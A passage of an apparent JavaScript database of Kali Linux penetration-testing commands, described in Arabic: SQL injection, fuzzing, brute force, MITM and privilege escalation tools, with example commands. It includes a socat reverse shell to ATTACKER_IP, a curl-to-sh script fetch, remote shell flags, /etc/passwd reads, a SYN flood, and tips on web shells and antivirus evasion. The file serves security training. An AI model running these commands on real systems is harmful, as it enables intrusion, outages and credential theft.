// ============================================================
// KALI LINUX MASTER COMMANDS DATABASE - PART 8
// Additional Commands to reach 500 total
// Categories: Web App Testing, Cloud, Forensics, AD, CTF, Scripting
// ============================================================
const CMD_PART8 = [

// ─── WEB APPLICATION SECURITY ────────────────────────────────
{
  id: 801, name: 'sqlmap', cat: 'webapp', level: 'intermediate',
  syntax: 'sqlmap -u URL [OPTIONS]',
  short: 'كشف واستغلال SQL Injection تلقائياً',
  desc: `sqlmap أداة مفتوحة المصدر تكتشف وتستغل ثغرات SQL Injection تلقائياً. تدعم MySQL, Oracle, PostgreSQL, MSSQL, SQLite وأكثر. تستطيع استخراج قواعد البيانات كاملةً وحتى الحصول على Shell على الخادم.`,
  options: [
    { flag: '-u URL', desc: 'تحديد URL الهدف' },
    { flag: '--dbs', desc: 'استخراج أسماء قواعد البيانات' },
    { flag: '-D db --tables', desc: 'استخراج جداول قاعدة بيانات محددة' },
    { flag: '-D db -T table --dump', desc: 'تفريغ محتوى جدول' },
    { flag: '--level=5 --risk=3', desc: 'زيادة عمق الفحص' },
    { flag: '--tamper=space2comment', desc: 'تجاوز WAF' },
    { flag: '--os-shell', desc: 'الحصول على Shell على الخادم' },
    { flag: '--cookie="PHPSESSID=abc"', desc: 'إرسال Cookie مع الطلب' },
  ],
  examples: [
    { cmd: 'sqlmap -u "http://target.com/page?id=1" --dbs', desc: 'استخراج قواعد البيانات' },
    { cmd: 'sqlmap -u "http://target.com/page?id=1" -D mydb --tables', desc: 'استخراج الجداول' },
    { cmd: 'sqlmap -u "http://target.com/page?id=1" --batch --dbs', desc: 'تشغيل بدون تفاعل' },
    { cmd: 'sqlmap -r request.txt --dbs', desc: 'استخدام طلب HTTP محفوظ من Burp' },
    { cmd: 'sqlmap -u "http://target.com/login" --data="user=a&pass=b" --dbs', desc: 'POST Request' },
  ],
  tips: '💡 احفظ الطلب من Burp Suite واستخدم -r request.txt للدقة الأعلى',
  related: ['burpsuite', 'ghauri', 'msfconsole'],
},
{
  id: 802, name: 'nikto', cat: 'webapp', level: 'beginner',
  syntax: 'nikto -h TARGET [OPTIONS]',
  short: 'فحص ثغرات خوادم الويب',
  desc: `Nikto فاحص خوادم ويب يفحص أكثر من 6700 ثغرة وإعداد خاطئ محتمل. يكشف الملفات الخطيرة وإصدارات البرامج القديمة والمشكلات الأمنية في HTTP Headers.`,
  options: [
    { flag: '-h HOST', desc: 'تحديد الهدف (IP أو Domain)' },
    { flag: '-p PORT', desc: 'تحديد المنفذ (افتراضياً 80)' },
    { flag: '-ssl', desc: 'فحص عبر HTTPS' },
    { flag: '-o file -Format html', desc: 'حفظ تقرير HTML' },
    { flag: '-useproxy http://127.0.0.1:8080', desc: 'توجيه عبر Burp' },
    { flag: '-Tuning 9', desc: 'فحص SQL Injection فقط' },
  ],
  examples: [
    { cmd: 'nikto -h http://target.com', desc: 'فحص أساسي' },
    { cmd: 'nikto -h target.com -ssl -p 443', desc: 'فحص HTTPS على منفذ 443' },
    { cmd: 'nikto -h target.com -o report.html -Format html', desc: 'تقرير HTML' },
    { cmd: 'nikto -h target.com -useproxy http://127.0.0.1:8080', desc: 'عبر Burp Proxy' },
  ],
  tips: '⚠️ Nikto يترك آثاراً واضحة في السجلات. استخدمه فقط على أجهزة مرخّصة.',
  related: ['burpsuite', 'owasp-zap', 'nuclei'],
},
{
  id: 803, name: 'gobuster', cat: 'webapp', level: 'beginner',
  syntax: 'gobuster dir -u URL -w WORDLIST',
  short: 'اكتشاف المجلدات والملفات الخفية',
  desc: `Gobuster أداة Go لاكتشاف المجلدات والملفات والنطاقات الفرعية المخفية. أسرع بكثير من dirb وdirbuster. تدعم HTTP/HTTPS وتعمل بخيوط متعددة.`,
  options: [
    { flag: 'dir', desc: 'وضع اكتشاف المجلدات والملفات' },
    { flag: 'dns', desc: 'وضع اكتشاف النطاقات الفرعية' },
    { flag: '-u URL', desc: 'الـ URL الهدف' },
    { flag: '-w WORDLIST', desc: 'قائمة الكلمات للبحث' },
    { flag: '-x php,html,txt', desc: 'تحديد الامتدادات' },
    { flag: '-t 50', desc: 'عدد الخيوط المتزامنة' },
    { flag: '-s 200,301,302', desc: 'رموز الاستجابة المقبولة' },
  ],
  examples: [
    { cmd: 'gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt', desc: 'فحص أساسي' },
    { cmd: 'gobuster dir -u http://target.com -w common.txt -x php,html,js', desc: 'مع امتدادات' },
    { cmd: 'gobuster dns -d target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million.txt', desc: 'اكتشاف Subdomains' },
    { cmd: 'gobuster dir -u http://target.com -w big.txt -t 50 -o results.txt', desc: 'مع حفظ النتائج' },
  ],
  tips: '💡 استخدم قوائم SecLists للحصول على نتائج أفضل: /usr/share/seclists/',
  related: ['ffuf', 'feroxbuster', 'dirbuster'],
},
{
  id: 804, name: 'burpsuite', cat: 'webapp', level: 'intermediate',
  syntax: 'burpsuite',
  short: 'منصة اختبار أمان تطبيقات الويب الأشهر',
  desc: `Burp Suite المنصة الأكثر استخداماً لاختبار أمان تطبيقات الويب. يعمل كـ Proxy يعترض ويعدّل الطلبات والاستجابات. يتضمن: Scanner، Intruder، Repeater، Decoder، Comparer، Sequencer.`,
  options: [
    { flag: 'Proxy > Intercept', desc: 'اعتراض وتعديل الطلبات' },
    { flag: 'Repeater', desc: 'إعادة إرسال الطلبات وتعديلها' },
    { flag: 'Intruder', desc: 'هجمات Brute Force وFuzzing' },
    { flag: 'Scanner', desc: 'فحص تلقائي للثغرات (Pro فقط)' },
    { flag: 'Decoder', desc: 'فك وتشفير بصيغ متعددة' },
  ],
  examples: [
    { cmd: 'burpsuite &', desc: 'تشغيل Burp Suite' },
    { cmd: '# Proxy: 127.0.0.1:8080', desc: 'إعداد المتصفح للـ Proxy' },
    { cmd: '# Import CA: http://burpsuite', desc: 'استيراد شهادة Burp للـ HTTPS' },
    { cmd: '# Right click request > Send to Repeater', desc: 'إرسال طلب للـ Repeater' },
    { cmd: '# Intruder > Positions > Attack Type: Sniper', desc: 'إعداد هجوم Brute Force' },
  ],
  tips: '💡 الإصدار Community مجاني. Pro يضيف Scanner التلقائي.',
  related: ['owasp-zap', 'mitmproxy', 'sqlmap'],
},
{
  id: 805, name: 'ffuf', cat: 'webapp', level: 'intermediate',
  syntax: 'ffuf -u URL/FUZZ -w WORDLIST',
  short: 'Fuzzer سريع لتطبيقات الويب',
  desc: `FFUF (Fuzz Faster U Fool) أداة Go سريعة جداً للـ Web Fuzzing. تكتشف المجلدات والملفات والـ Parameters والـ Subdomains. أسرع من Gobuster في كثير من الحالات وأكثر مرونة.`,
  options: [
    { flag: '-u URL', desc: 'الـ URL مع كلمة FUZZ كـ placeholder' },
    { flag: '-w WORDLIST', desc: 'قائمة الكلمات' },
    { flag: '-mc 200,301', desc: 'رموز الاستجابة المقبولة' },
    { flag: '-fs SIZE', desc: 'تصفية استجابات بحجم معين' },
    { flag: '-H "Header: Value"', desc: 'إضافة Header مخصص' },
    { flag: '-X POST -d "data"', desc: 'Fuzzing على POST data' },
    { flag: '-ac', desc: 'تصفية تلقائية للاستجابات المتطابقة' },
  ],
  examples: [
    { cmd: 'ffuf -u http://target.com/FUZZ -w common.txt', desc: 'اكتشاف مجلدات' },
    { cmd: 'ffuf -u http://target.com/FUZZ -w common.txt -e .php,.html,.txt', desc: 'مع امتدادات' },
    { cmd: 'ffuf -u http://target.com/page?FUZZ=value -w params.txt -mc 200', desc: 'Parameter Fuzzing' },
    { cmd: 'ffuf -u http://FUZZ.target.com -w subs.txt -mc 200', desc: 'Subdomain Fuzzing' },
    { cmd: 'ffuf -u http://target.com/login -X POST -d "user=FUZZ&pass=admin" -w users.txt', desc: 'POST Fuzzing' },
  ],
  tips: '💡 -ac للتصفية التلقائية. -rate 100 للتحكم في السرعة.',
  related: ['gobuster', 'feroxbuster', 'burpsuite'],
},
{
  id: 806, name: 'wfuzz', cat: 'webapp', level: 'intermediate',
  syntax: 'wfuzz [OPTIONS] -w WORDLIST URL/FUZZ',
  short: 'Fuzzer متعدد الاستخدامات لتطبيقات الويب',
  desc: `WFuzz أداة Python للـ Fuzzing في تطبيقات الويب. تدعم Fuzzing في أي مكان في الطلب: URL، Headers، POST Data، Cookies. قوية جداً مع إمكانية استخدام متغيرات متعددة.`,
  options: [
    { flag: '-w wordlist', desc: 'قائمة الكلمات' },
    { flag: '--hc 404', desc: 'إخفاء رموز استجابة محددة' },
    { flag: '--hl 0', desc: 'إخفاء استجابات بعدد أسطر محدد' },
    { flag: '-H "Cookie: FUZZ"', desc: 'Fuzzing في Cookie' },
    { flag: '--basic user:FUZZ', desc: 'Basic Auth Fuzzing' },
    { flag: '-z range,1-100', desc: 'Fuzzing بأرقام' },
  ],
  examples: [
    { cmd: 'wfuzz -w /usr/share/wordlists/dirb/common.txt --hc 404 http://target.com/FUZZ', desc: 'اكتشاف مجلدات' },
    { cmd: 'wfuzz -w users.txt -w passwords.txt --hc 403 http://target.com/login?user=FUZZ&pass=FUZ2Z', desc: 'Brute Force بمتغيرين' },
    { cmd: 'wfuzz -w payloads.txt -H "X-Forwarded-For: FUZZ" http://target.com/', desc: 'Header Fuzzing' },
  ],
  tips: '💡 FUZ2Z، FUZ3Z لاستخدام قوائم متعددة في نفس الطلب.',
  related: ['ffuf', 'burpsuite', 'hydra'],
},
{
  id: 807, name: 'xsser', cat: 'webapp', level: 'intermediate',
  syntax: 'xsser --url URL [OPTIONS]',
  short: 'اكتشاف واستغلال ثغرات XSS',
  desc: `XSSer أداة مفتوحة المصدر لاكتشاف واستغلال ثغرات Cross-Site Scripting (XSS). تدعم عشرات أنواع الـ Payloads وتجاوز الـ Filters والـ WAFs.`,
  options: [
    { flag: '--url URL', desc: 'الـ URL الهدف' },
    { flag: '-p "PARAM=XSS"', desc: 'تحديد المعامل المستهدف' },
    { flag: '--auto', desc: 'اختبار تلقائي لكل المعاملات' },
    { flag: '--Fp PAYLOAD', desc: 'استخدام Payload مخصص' },
    { flag: '--cookie "COOKIE"', desc: 'إرسال Cookie مصادقة' },
  ],
  examples: [
    { cmd: 'xsser --url "http://target.com/search?q=XSS"', desc: 'فحص XSS أساسي' },
    { cmd: 'xsser --url "http://target.com/page" --auto', desc: 'فحص تلقائي' },
    { cmd: 'xsser --url "http://target.com/search?q=XSS" --Fp "<script>alert(1)</script>"', desc: 'Payload مخصص' },
  ],
  tips: '💡 استخدم Dalfox أيضاً - أسرع وأحدث من XSSer.',
  related: ['dalfox', 'burpsuite', 'sqlmap'],
},
{
  id: 808, name: 'commix', cat: 'webapp', level: 'intermediate',
  syntax: 'commix --url URL --data="DATA"',
  short: 'اكتشاف واستغلال Command Injection',
  desc: `Commix أداة Python لاكتشاف واستغلال ثغرات Command Injection (OS Command Injection). تدعم عشرات تقنيات الحقن وتستطيع الحصول على Reverse Shell.`,
  options: [
    { flag: '--url URL', desc: 'الـ URL الهدف' },
    { flag: '--data "param=value"', desc: 'POST Data' },
    { flag: '--cookie "SESSION=abc"', desc: 'Cookie المصادقة' },
    { flag: '--os-cmd "id"', desc: 'تنفيذ أمر مباشر' },
    { flag: '--os-shell', desc: 'الحصول على Shell تفاعلي' },
  ],
  examples: [
    { cmd: 'commix --url "http://target.com/ping?host=127.0.0.1"', desc: 'فحص Command Injection' },
    { cmd: 'commix --url "http://target.com/page" --data="input=test" --os-shell', desc: 'الحصول على Shell' },
    { cmd: 'commix --url "http://target.com/cmd" --os-cmd="cat /etc/passwd"', desc: 'قراءة ملف حساس' },
  ],
  tips: '💡 جرّب مع Burp Suite لتحديد النقاط المعرضة أولاً.',
  related: ['sqlmap', 'burpsuite', 'msfconsole'],
},
{
  id: 809, name: 'davtest', cat: 'webapp', level: 'intermediate',
  syntax: 'davtest -url URL',
  short: 'اختبار WebDAV للرفع الخطير',
  desc: `DAVTest يختبر خوادم WebDAV ويحاول رفع ملفات بامتدادات مختلفة لتحديد ما يُسمح تنفيذه على الخادم.`,
  options: [
    { flag: '-url URL', desc: 'عنوان الخادم WebDAV' },
    { flag: '-auth user:pass', desc: 'بيانات المصادقة' },
    { flag: '-uploadfile FILE', desc: 'رفع ملف محدد' },
    { flag: '-uploadloc PATH', desc: 'مسار الرفع' },
  ],
  examples: [
    { cmd: 'davtest -url http://target.com/webdav/', desc: 'اختبار WebDAV' },
    { cmd: 'davtest -url http://target.com/webdav/ -auth admin:password', desc: 'مع مصادقة' },
    { cmd: 'cadaver http://target.com/webdav/', desc: 'WebDAV Client تفاعلي' },
  ],
  tips: '💡 إذا نجح رفع PHP، جرّب رفع Web Shell.',
  related: ['curl', 'burpsuite', 'msfconsole'],
},
{
  id: 810, name: 'whatweb', cat: 'webapp', level: 'beginner',
  syntax: 'whatweb [OPTIONS] URL',
  short: 'تعريف تقنيات الموقع',
  desc: `WhatWeb يكشف التقنيات المستخدمة في موقع الويب: CMS، Web Server، Frameworks، لغات البرمجة، الإصدارات. يدعم أكثر من 1800 Plugin.`,
  options: [
    { flag: '-v', desc: 'إخراج مفصل' },
    { flag: '--aggression 3', desc: 'مستوى الفحص (1-4)' },
    { flag: '-l URLLIST', desc: 'فحص قائمة URLs' },
    { flag: '--log-json FILE', desc: 'حفظ بصيغة JSON' },
  ],
  examples: [
    { cmd: 'whatweb http://target.com', desc: 'فحص أساسي' },
    { cmd: 'whatweb -v http://target.com', desc: 'مخرجات مفصلة' },
    { cmd: 'whatweb --aggression 3 http://target.com', desc: 'فحص أعمق' },
    { cmd: 'cat urls.txt | xargs whatweb', desc: 'فحص قائمة URLs' },
  ],
  tips: '💡 اجمعه مع Wappalyzer للتعرف الشامل على التقنيات.',
  related: ['nmap', 'nikto', 'burpsuite'],
},

// ─── NETWORK SECURITY ────────────────────────────────────────
{
  id: 811, name: 'hping3', cat: 'network', level: 'advanced',
  syntax: 'hping3 [OPTIONS] TARGET',
  short: 'إرسال حزم TCP/UDP/ICMP مخصصة',
  desc: `hping3 أداة لإرسال حزم شبكية مخصصة TCP/UDP/ICMP/RAW-IP. تُستخدم في اختبار الجدران النارية، DDoS Testing، Port Scanning، OS Fingerprinting، وأبحاث الشبكات.`,
  options: [
    { flag: '-S', desc: 'إرسال حزم SYN' },
    { flag: '-A', desc: 'إرسال حزم ACK' },
    { flag: '-p PORT', desc: 'تحديد المنفذ الهدف' },
    { flag: '--flood', desc: 'إرسال أسرع ما يمكن (DoS Test)' },
    { flag: '-a FAKE_IP', desc: 'تزوير عنوان IP المصدر' },
    { flag: '--rand-source', desc: 'IP مصدر عشوائي' },
    { flag: '-c COUNT', desc: 'عدد الحزم' },
  ],
  examples: [
    { cmd: 'hping3 -S -p 80 target.com', desc: 'SYN Scan على منفذ 80' },
    { cmd: 'hping3 --icmp target.com', desc: 'Ping ICMP' },
    { cmd: 'hping3 -S --flood -p 80 target.com', desc: 'SYN Flood (اختبار فقط)' },
    { cmd: 'hping3 -S -p 22 --scan 1-1000 target.com', desc: 'مسح نطاق منافذ' },
  ],
  tips: '⚠️ --flood للاختبار فقط على أنظمة مرخّصة. يمكن أن يعطل الخوادم.',
  related: ['nmap', 'scapy', 'tcpdump'],
},
{
  id: 812, name: 'netdiscover', cat: 'network', level: 'beginner',
  syntax: 'netdiscover -r NETWORK/CIDR',
  short: 'اكتشاف الأجهزة في الشبكة المحلية',
  desc: `Netdiscover يكتشف الأجهزة المتصلة بالشبكة المحلية عبر ARP Requests. يُظهر IP وMAC ومُصنّع الجهاز. يدعم وضع الـ Passive للتجسس الهادئ.`,
  options: [
    { flag: '-r RANGE', desc: 'نطاق الشبكة للمسح' },
    { flag: '-i INTERFACE', desc: 'الواجهة الشبكية' },
    { flag: '-p', desc: 'Passive Mode (استماع فقط)' },
    { flag: '-c COUNT', desc: 'عدد مرات الإرسال' },
  ],
  examples: [
    { cmd: 'sudo netdiscover -r 192.168.1.0/24', desc: 'مسح الشبكة المحلية' },
    { cmd: 'sudo netdiscover -i wlan0 -r 10.0.0.0/24', desc: 'مسح عبر WiFi' },
    { cmd: 'sudo netdiscover -p -i eth0', desc: 'Passive Mode' },
  ],
  tips: '💡 -p للـ Passive Mode: يستمع فقط دون إرسال ARP.',
  related: ['nmap', 'arp-scan', 'masscan'],
},
{
  id: 813, name: 'arp-scan', cat: 'network', level: 'beginner',
  syntax: 'arp-scan [OPTIONS] TARGET',
  short: 'فحص الشبكة بـ ARP',
  desc: `arp-scan يرسل ARP Requests لاكتشاف الأجهزة في الشبكة. أسرع من netdiscover وأكثر دقة. يُظهر IP وMAC ومُصنّع الجهاز.`,
  options: [
    { flag: '--interface=eth0', desc: 'تحديد الواجهة' },
    { flag: '--localnet', desc: 'مسح الشبكة المحلية تلقائياً' },
    { flag: '--bandwidth=1000000', desc: 'تحديد معدل الإرسال' },
    { flag: '--retry=3', desc: 'عدد مرات إعادة الإرسال' },
  ],
  examples: [
    { cmd: 'sudo arp-scan --localnet', desc: 'مسح الشبكة المحلية' },
    { cmd: 'sudo arp-scan -I eth0 192.168.1.0/24', desc: 'مسح نطاق محدد' },
    { cmd: 'sudo arp-scan --interface=wlan0 --localnet', desc: 'عبر WiFi' },
  ],
  tips: '💡 يعمل فقط على نفس الشبكة المحلية (Layer 2).',
  related: ['netdiscover', 'nmap', 'masscan'],
},
{
  id: 814, name: 'socat', cat: 'network', level: 'intermediate',
  syntax: 'socat [OPTIONS] ADDRESS1 ADDRESS2',
  short: 'Swiss Army Knife لاتصالات الشبكة المتقدمة',
  desc: `Socat أداة قوية لإعادة توجيه الاتصالات الشبكية. أقوى من Netcat وتدعم SSL/TLS، Unix Sockets، Serial Ports. تُستخدم في إنشاء Reverse Shells وPort Forwarding وTunneling.`,
  options: [
    { flag: 'TCP:HOST:PORT', desc: 'اتصال TCP' },
    { flag: 'TCP-LISTEN:PORT', desc: 'الاستماع على منفذ' },
    { flag: 'OPENSSL:HOST:PORT', desc: 'اتصال SSL/TLS' },
    { flag: 'EXEC:/bin/bash', desc: 'تشغيل shell' },
    { flag: 'FILE:/dev/tty', desc: 'اتصال بـ Terminal' },
  ],
  examples: [
    { cmd: 'socat TCP-LISTEN:4444,reuseaddr -', desc: 'Listener بسيط' },
    { cmd: 'socat TCP:ATTACKER_IP:4444 EXEC:/bin/bash,pty,stderr', desc: 'Reverse Shell كامل' },
    { cmd: 'socat TCP-LISTEN:8080,fork TCP:INTERNAL_IP:80', desc: 'Port Forwarding' },
    { cmd: 'socat -d -d TCP-LISTEN:443,reuseaddr OPENSSL-LISTEN:443', desc: 'SSL Relay' },
  ],
  tips: '💡 EXEC:/bin/bash,pty يعطي TTY كامل - أفضل من Netcat.',
  related: ['netcat', 'chisel', 'ssh-tunnel'],
},
{
  id: 815, name: 'bettercap', cat: 'network', level: 'advanced',
  syntax: 'bettercap -iface INTERFACE',
  short: 'MITM وهجمات الشبكة المتقدمة',
  desc: `Bettercap إطار عمل متقدم لهجمات Man-in-the-Middle وتحليل الشبكة. يدعم: ARP Spoofing، DNS Spoofing، SSL Stripping، WiFi Attacks، BLE Attacks. واجهة تفاعلية قوية.`,
  options: [
    { flag: '-iface INTERFACE', desc: 'الواجهة الشبكية' },
    { flag: '-caplet FILE', desc: 'تشغيل Caplet (سكريبت)' },
    { flag: '-eval "CMD"', desc: 'تنفيذ أمر مباشر' },
  ],
  examples: [
    { cmd: 'sudo bettercap -iface eth0', desc: 'تشغيل Bettercap' },
    { cmd: 'net.probe on; net.show', desc: 'اكتشاف الأجهزة (داخل bettercap)' },
    { cmd: 'arp.spoof.targets 192.168.1.100; arp.spoof on', desc: 'ARP Spoofing' },
    { cmd: 'https.proxy on; net.sniff on', desc: 'اعتراض HTTPS' },
  ],
  tips: '⚠️ MITM Attacks غير قانونية بدون إذن. للبيئات الاختبارية فقط.',
  related: ['mitmproxy', 'ettercap', 'arpspoof'],
},

// ─── PASSWORD ATTACKS ─────────────────────────────────────────
{
  id: 816, name: 'hydra', cat: 'password', level: 'intermediate',
  syntax: 'hydra [OPTIONS] TARGET SERVICE',
  short: 'Brute Force للخدمات الشبكية',
  desc: `THC-Hydra أداة Brute Force متوازية للخدمات الشبكية. تدعم 50+ بروتوكول: SSH، FTP، HTTP، SMTP، RDP، SMB، MySQL، وغيرها. الأسرع والأكثر استخداماً.`,
  options: [
    { flag: '-l USER', desc: 'اسم مستخدم محدد' },
    { flag: '-L USERLIST', desc: 'قائمة مستخدمين' },
    { flag: '-p PASS', desc: 'كلمة مرور محددة' },
    { flag: '-P PASSLIST', desc: 'قائمة كلمات مرور' },
    { flag: '-t 4', desc: 'عدد الخيوط (4 للـ SSH)' },
    { flag: '-s PORT', desc: 'منفذ مخصص' },
    { flag: '-o FILE', desc: 'حفظ النتائج' },
  ],
  examples: [
    { cmd: 'hydra -l root -P rockyou.txt ssh://192.168.1.10', desc: 'Brute Force SSH' },
    { cmd: 'hydra -l admin -P rockyou.txt ftp://192.168.1.10', desc: 'Brute Force FTP' },
    { cmd: 'hydra -l admin -P rockyou.txt http-post-form "target.com/login:user=^USER^&pass=^PASS^:Invalid"', desc: 'HTTP POST Login' },
    { cmd: 'hydra -L users.txt -P passwords.txt smb://192.168.1.10', desc: 'SMB Brute Force' },
    { cmd: 'hydra -l administrator -P rockyou.txt rdp://192.168.1.10', desc: 'RDP Brute Force' },
  ],
  tips: '⚠️ قد يُقفل الحسابات. استخدم -t 4 للـ SSH و-t 16 للـ HTTP.',
  related: ['medusa', 'ncrack', 'hashcat'],
},
{
  id: 817, name: 'john', cat: 'password', level: 'intermediate',
  syntax: 'john [OPTIONS] HASHFILE',
  short: 'كسر كلمات المرور بـ CPU',
  desc: `John the Ripper أداة كسر كلمات مرور تعمل على CPU. ممتازة لكسر هاشات /etc/shadow على Linux و SAM على Windows. تحدد نوع الهاش تلقائياً وتدعم Dictionary وBrute Force وRule-based.`,
  options: [
    { flag: '--wordlist=FILE', desc: 'قاموس كلمات المرور' },
    { flag: '--rules', desc: 'تطبيق قواعد التحويل' },
    { flag: '--format=FORMAT', desc: 'تحديد نوع الهاش يدوياً' },
    { flag: '--show', desc: 'عرض كلمات المرور المكسورة' },
    { flag: '--incremental', desc: 'Brute Force تدريجي' },
  ],
  examples: [
    { cmd: 'john /etc/shadow --wordlist=/usr/share/wordlists/rockyou.txt', desc: 'كسر /etc/shadow' },
    { cmd: 'john hashes.txt --format=md5crypt --wordlist=rockyou.txt', desc: 'MD5 Crypt' },
    { cmd: 'zip2john protected.zip > zip_hash.txt && john zip_hash.txt', desc: 'كسر ZIP محمي' },
    { cmd: 'john hashes.txt --show', desc: 'عرض النتائج' },
    { cmd: 'john --list=formats | grep -i ntlm', desc: 'قائمة أنواع الهاشات المدعومة' },
  ],
  tips: '💡 استخدم hashcat مع GPU لكسر أسرع بعشرات المرات.',
  related: ['hashcat', 'hydra', 'hash-identifier'],
},
{
  id: 818, name: 'hash-identifier', cat: 'password', level: 'beginner',
  syntax: 'hash-identifier',
  short: 'تحديد نوع الهاش',
  desc: `hash-identifier أداة Python لتحديد نوع هاش كلمة المرور. تساعدك في معرفة ما إذا كان MD5 أو SHA1 أو SHA256 أو bcrypt أو NTLM أو غيرها قبل محاولة الكسر.`,
  options: [
    { flag: 'hashid', desc: 'أداة بديلة أكثر دقة' },
  ],
  examples: [
    { cmd: 'hash-identifier', desc: 'تشغيل وإدخال الهاش تفاعلياً' },
    { cmd: 'hashid "5f4dcc3b5aa765d61d8327deb882cf99"', desc: 'تحديد نوع الهاش' },
    { cmd: 'hashid -m hashes.txt', desc: 'تحديد نوع مع رقم وضع Hashcat' },
    { cmd: 'echo "5f4dcc3b5aa765d61d8327deb882cf99" | hashid', desc: 'عبر Pipe' },
  ],
  tips: '💡 hashid -m يُظهر رقم -m المناسب لـ hashcat مباشرة.',
  related: ['hashcat', 'john', 'haiti'],
},
{
  id: 819, name: 'cewl', cat: 'password', level: 'intermediate',
  syntax: 'cewl [OPTIONS] URL',
  short: 'إنشاء قاموس من موقع الهدف',
  desc: `CeWL يزحف على موقع ويب ويستخرج الكلمات منه لإنشاء قاموس مخصص. فعّال جداً لأن الموظفين يستخدمون كلمات متعلقة بالشركة.`,
  options: [
    { flag: '-d DEPTH', desc: 'عمق الزحف' },
    { flag: '-m MIN', desc: 'الحد الأدنى لطول الكلمة' },
    { flag: '-w FILE', desc: 'حفظ القاموس في ملف' },
    { flag: '--email', desc: 'استخراج عناوين البريد أيضاً' },
    { flag: '--with-numbers', desc: 'تضمين الكلمات مع أرقام' },
  ],
  examples: [
    { cmd: 'cewl http://target.com -d 3 -m 6 -w wordlist.txt', desc: 'إنشاء قاموس' },
    { cmd: 'cewl http://target.com --email -w emails.txt', desc: 'استخراج بريد إلكتروني' },
    { cmd: 'cewl http://target.com -d 2 -m 5 --with-numbers -w custom.txt', desc: 'قاموس مع أرقام' },
  ],
  tips: '💡 اجمع CeWL مع hashcat --rules لتوليد تنويعات إضافية.',
  related: ['hashcat', 'john', 'crunch'],
},
{
  id: 820, name: 'crunch', cat: 'password', level: 'intermediate',
  syntax: 'crunch MIN MAX [CHARSET] [OPTIONS]',
  short: 'توليد قوائم كلمات مرور مخصصة',
  desc: `Crunch ينشئ قوائم كلمات مرور وفق قواعد محددة: الطول، مجموعة الأحرف، الأنماط. مفيد لتوليد Wordlists مخصصة عندما تعرف جزءاً من كلمة المرور.`,
  options: [
    { flag: 'MIN MAX', desc: 'الحد الأدنى والأقصى للطول' },
    { flag: 'CHARSET', desc: 'مجموعة الأحرف المستخدمة' },
    { flag: '-o FILE', desc: 'حفظ الناتج في ملف' },
    { flag: '-t PATTERN', desc: 'نمط ثابت (@ للحروف، , للأرقام)' },
    { flag: '-d 2', desc: 'الحد الأقصى للتكرار المتتالي' },
  ],
  examples: [
    { cmd: 'crunch 8 8 abcdefghij -o wordlist.txt', desc: '8 أحرف من مجموعة محددة' },
    { cmd: 'crunch 6 8 0123456789 -o numbers.txt', desc: 'أرقام 6-8 خانات' },
    { cmd: 'crunch 8 8 -t Target@@@@', desc: 'نمط ثابت (Target + 4 أرقام)' },
    { cmd: 'crunch 8 8 abcdefghijklmnopqrstuvwxyz | hashcat -m 0 hash.txt --stdin', desc: 'مباشرة لـ hashcat' },
  ],
  tips: '⚠️ الملفات الناتجة قد تكون ضخمة جداً. استخدم --stdout مع hashcat.',
  related: ['hashcat', 'john', 'cewl'],
},

// ─── PRIVILEGE ESCALATION ─────────────────────────────────────
{
  id: 821, name: 'linpeas', cat: 'privesc', level: 'intermediate',
  syntax: './linpeas.sh [OPTIONS]',
  short: 'اكتشاف مسارات رفع الصلاحيات في Linux',
  desc: `LinPEAS أشهر سكريبت لاكتشاف مسارات رفع الصلاحيات في Linux/Unix. يفحص: SUID/SGID، Sudo، Cron Jobs، Services، Network، Interesting Files، Credentials، CVEs.`,
  options: [
    { flag: '-a', desc: 'فحص شامل (أبطأ)' },
    { flag: '-q', desc: 'وضع هادئ (أقل مخرجات)' },
    { flag: '-s', desc: 'الاتصال الآمن' },
    { flag: '| tee output.txt', desc: 'حفظ المخرجات' },
  ],
  examples: [
    { cmd: 'curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh', desc: 'تشغيل مباشر' },
    { cmd: './linpeas.sh 2>&1 | tee linpeas_output.txt', desc: 'مع حفظ المخرجات' },
    { cmd: './linpeas.sh -a 2>&1 | less -R', desc: 'فحص شامل مع ألوان' },
    { cmd: './linpeas.sh | grep -i "99%\\|95%"', desc: 'النتائج عالية الاحتمالية فقط' },
  ],
  tips: '💡 الألوان: أحمر/أصفر = مثير للاهتمام. الأعلى احتمالاً محدد بنسبة.',
  related: ['winpeas', 'pspy', 'sudo-l'],
},
{
  id: 822, name: 'winpeas', cat: 'privesc', level: 'intermediate',
  syntax: 'winpeas.exe [OPTIONS]',
  short: 'اكتشاف مسارات رفع الصلاحيات في Windows',
  desc: `WinPEAS نسخة Windows من LinPEAS. يفحص كل مسارات رفع الصلاحيات: Unquoted Service Paths، AlwaysInstallElevated، Token Impersonation، Registry Permissions، وغيرها.`,
  options: [
    { flag: 'quiet', desc: 'وضع هادئ' },
    { flag: 'notcolor', desc: 'بدون ألوان' },
    { flag: 'log', desc: 'حفظ في ملف winpeas.log' },
  ],
  examples: [
    { cmd: '.\\winpeas.exe', desc: 'فحص شامل' },
    { cmd: '.\\winpeas.exe quiet log', desc: 'حفظ في ملف' },
    { cmd: '.\\winpeas.exe systeminfo userinfo', desc: 'فحص مقسّم' },
    { cmd: 'powershell -ep bypass -c ".\\winpeas.exe"', desc: 'تجاوز Execution Policy' },
  ],
  tips: '💡 قد يُشغّل AV تنبيهات. جرّب obfuscated version.',
  related: ['linpeas', 'powerup', 'seatbelt'],
},
{
  id: 823, name: 'pspy', cat: 'privesc', level: 'intermediate',
  syntax: './pspy [OPTIONS]',
  short: 'مراقبة العمليات والـ Cron Jobs بدون صلاحيات',
  desc: `pspy يراقب العمليات الجارية على Linux دون الحاجة لـ root. يكشف الأوامر التي تشغّلها حسابات أخرى أو Cron Jobs، مما يمكن استغلاله لرفع الصلاحيات.`,
  options: [
    { flag: '-p', desc: 'مراقبة فقط (بدون inotify)' },
    { flag: '-i 1000', desc: 'الفاصل الزمني بالمللي ثانية' },
    { flag: '-f', desc: 'مراقبة إضافية للـ Filesystem' },
  ],
  examples: [
    { cmd: './pspy64 -p -i 1000', desc: 'مراقبة العمليات كل ثانية' },
    { cmd: './pspy64 2>&1 | tee pspy_output.txt', desc: 'مع حفظ المخرجات' },
    { cmd: './pspy32 -f', desc: 'مراقبة الملفات أيضاً (32-bit)' },
  ],
  tips: '💡 انتظر بضع دقائق لاكتشاف Cron Jobs الدورية.',
  related: ['linpeas', 'crontab', 'sudo-l'],
},
{
